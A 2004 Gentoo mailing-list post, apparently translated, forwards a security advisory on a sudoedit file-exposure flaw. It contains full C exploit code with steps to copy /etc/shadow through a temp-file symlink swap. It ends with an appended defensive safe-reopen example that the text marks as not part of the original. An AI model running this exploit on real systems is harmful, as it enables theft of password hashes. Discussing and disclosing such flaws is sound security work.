Gentoo Archives: gentoo-user-de

From: Dominik Elsbroek <Dominik.Elsbroek@×××××××××××××.de>
To: gentoo-user-de@l.g.o
Subject: Re: [gentoo-user-de] sudo version and bug ?
Date: Tue, 05 Oct 2004 13:26:17
Message-Id: 4162A0F7.7000207@UP-Consulting.de
In Reply to: Re: [gentoo-user-de] sudo version and bug ? by Christoph Probst
Christoph Probst wrote:
> Hello.
>
> Dominik Elsbroek wrote on 05.10.2004 at 14:53:
>
>> I have a more or less serious problem with sudo. With the option
>> -u it is possible for an attacker to use the sudo command to read
>> files to which he should not actually have access.
>
> That is exactly the purpose of sudo. What has this user been allowed in
> /etc/sudoers (use visudo to edit it)? If nothing is enabled there
> (i.e. everything has a "#" in front of it), then it may really be
> a bug. Otherwise my first guess is a configuration error.
>
> There is a current security problem in sudo, but it is more
> theoretical: http://www.sudo.ws/sudo/alerts/sudoedit.html
>
> Apart from that, I cannot find anything suspicious in the changelog from
> version 1.6.7p5 onwards. You are right, though: an update to 1.6.8p1 is due.
>
> Chris
>

Hm... well, if it had been a config error I would not have
said: there is a bug... two, even

I received the following message by mail:

The following security advisory is sent to the securiteam mailing list,
and can be found at the SecuriTeam web site: http://www.securiteam.com

Sudo -u Parameter File Exposure
------------------------------------------------------------------------

SUMMARY

<http://www.sudo.ws/sudo/sudo.html> Sudo (superuser do) allows a system
administrator to give certain users (or groups of users) the ability to
run some (or all) commands as root or another user while logging the
commands and arguments.

A flaw exists in sudo's -u option (aka sudoedit) that can give an
attacker read permission to a file that would otherwise be unreadable.

DETAILS

Vulnerable Systems:
* sudo 1.6.8 and prior

Immune Systems:
* sudo version 1.6.8p1 and newer

While sudoedit runs the actual editor as the invoking user, the temporary
file is then re-opened with root privileges. An attacker can run sudoedit,
remove the editor temporary file, make a link to an unreadable file with
the same name as the old temporary file and quit the editor. The file
being edited via sudoedit will now contain a copy of the previously
unreadable file.

Impact:
Exploitation of the bug requires that the sudoers file be configured to
allow the attacker to run sudoedit. If no users have been granted access
to sudoedit there is no impact.

Fix:
The bug is fixed in sudo 1.6.8p1.

Exploit:
/*

Copyright Rosiello Security 2004
http://www.rosiello.org

sudoedit Exploit


SOFTWARE : sudoedit
REFERENCE: http://www.sudo.ws/sudo/alerts/sudoedit.html
DATE: 18/09/2004

Summary:
A flaw exists in sudo's -u option (aka sudoedit)
in sudo version 1.6.8 that can give an attacker
read permission to a file that would otherwise be
unreadable.

Sudo versions affected:
1.6.8 only

Credit:
Reznic Valery discovered the problem.

-----------------------------------------------------------

All the information that you can find in this software
were published for educational and didactic purpose only.
The author published this program under the condition
that is not in the intention of the reader to use them
in order to bring to himself or others a profit or to bring
to others damage.

!Respect the law!

How do I use this code ?

To exploit sudoedit you have to open with it the
file "rosiello" as shown in the example.

EXAMPLE SCENARIO:

1) Open two shells (i) and (ii);
2) (i)$sudoedit rosiello;
3) (ii)$./sudoedit-exploit /etc/shadow;
4) (i) close sudoedit.

The file "rosiello" is now a copy of "/etc/shadow".

AUTHOR : Angelo Rosiello
CONTACT: angelo@××××××××.org

*/

#include <stdio.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <dirent.h>


int main( int argc, char *argv[] )
{
    char PATH[]="/usr/tmp";
    char file[32];
    DIR *tmp;
    struct dirent *de;
    int found = 0;

    printf( "Copyright Rosiello Security 2004\n" );
    printf( "http://www.rosiello.org\n" );

    if( argc!=2 )
    {
        printf( "USAGE: %s file\n", argv[0] );
        return( -1 );
    }


    tmp = opendir ( PATH );
    while ( !found && (de = readdir ( tmp ))!= NULL )
    {
        if ( (strstr(de->d_name, "rosiello") != NULL) )
        {
            if( strlen(de->d_name) > 22 ) return( -1 );
            sprintf( file, "%s/%s", PATH, (char *)de->d_name );
            remove( file );
            if( fork()!=0 )
            {
                execl( "/bin/ln", "ln", "-s", argv[1], file, NULL );
            }
            wait( );
            printf( "Now you can close sudoedit and reopen rosiello!\n" );
            found=1;

        }

    }
    closedir( tmp );

    if( !found )
        printf( "File Not Found!\n" );
    return( 0 );

}

Regards, Dominik

--
gentoo-user-de@g.o mailing list
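
Added example (not part of the original message or the advisory, and not the fix shipped in sudo 1.6.8p1): the advisory's root cause is a privileged process re-opening a temporary file by name after an unprivileged user could replace it. The sketch below shows one defensive re-open that refuses symlinks, hard links and files with an unexpected owner; the names reopen_checked and demo and the /tmp/reopen-demo-* paths are assumptions made for this example.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: return a read-only fd for path only if the final path
 * component is not a symlink and the opened object is a regular file with a
 * single hard link owned by `owner`. Checks run on the fd (fstat), not on the
 * name, so the object cannot change between check and use. -1 on refusal. */
int reopen_checked(const char *path, uid_t owner)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;                      /* symlink (ELOOP) or missing file */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != owner) {
        close(fd);                      /* some other object took the name */
        return -1;
    }
    return fd;
}

/* Constructed scenario in a private mkdtemp() directory. Bits in the result:
 * 1 = untouched file accepted, 2 = wrong owner refused,
 * 4 = symlink swap refused,    8 = hard-link swap refused. */
int demo(void)
{
    char dir[] = "/tmp/reopen-demo-XXXXXX", tmpf[64], other[64];
    int fd, result = 0;
    if (!mkdtemp(dir)) return -1;
    snprintf(tmpf, sizeof tmpf, "%s/edit.tmp", dir);
    snprintf(other, sizeof other, "%s/other", dir);
    close(open(other, O_CREAT | O_WRONLY, 0600));
    close(open(tmpf, O_CREAT | O_EXCL | O_WRONLY, 0600));
    if ((fd = reopen_checked(tmpf, geteuid())) >= 0) { result |= 1; close(fd); }
    if (reopen_checked(tmpf, geteuid() + 1) < 0) result |= 2;
    unlink(tmpf);
    if (symlink(other, tmpf) == 0 && reopen_checked(tmpf, geteuid()) < 0) result |= 4;
    unlink(tmpf);
    if (link(other, tmpf) == 0 && reopen_checked(tmpf, geteuid()) < 0) result |= 8;
    unlink(tmpf); unlink(other); rmdir(dir);
    return result;
}

int main(void) { printf("checks passed mask: %d\n", demo()); return 0; }
```

The check keys on file type, owner and link count rather than on the inode number, because editors that save by rename legitimately replace the temporary file with a new inode.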

Replies

Subject Author
Re: [gentoo-user-de] sudo version and bug ? Christoph Probst <chris-usenet@×××××××××.org>